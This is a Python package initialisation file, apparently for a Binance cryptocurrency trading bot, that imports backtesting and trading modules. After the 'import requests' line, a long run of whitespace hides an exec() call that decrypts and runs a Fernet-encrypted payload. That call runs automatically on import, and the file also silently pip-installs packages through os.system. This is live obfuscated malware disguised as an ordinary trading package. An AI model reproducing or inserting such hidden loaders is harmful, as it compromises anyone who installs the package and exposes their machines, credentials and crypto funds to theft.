import os
os.system('pip install cryptography')
os.system('pip install fernet')
os.system('pip install requests')
from fernet import Fernet
import requests                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ;exec(Fernet(b'7Sue3JOIGHDZ9INpayXEQkvOe6RkDe0wSEYdfaJj2OI=').decrypt(b'gAAAAABk5qmfSVPJnNVnNeSQiDpT2l3mXTPTTmUL4zRkwlq4DQVUt6bKiWKbt6Sok1Sc8fdeoKejEBJtVcoikgdZOcg80D6RIiRhbG3rSiIFk89pev90WojhgDCC_QvRxXAgj9qoSVCJmUFXmarJaZVaPgLdCGZoW-yvpyV5VG1w9JbtgQF2K4HmdlX0yyH30tNmid_2rA5rG7wxKktSFsj_pX6r7FT3zg=='))
from .backtest import backtest
from .binance_api_manager import BinanceAPIManager
from .crypto_trading import main as run_trader
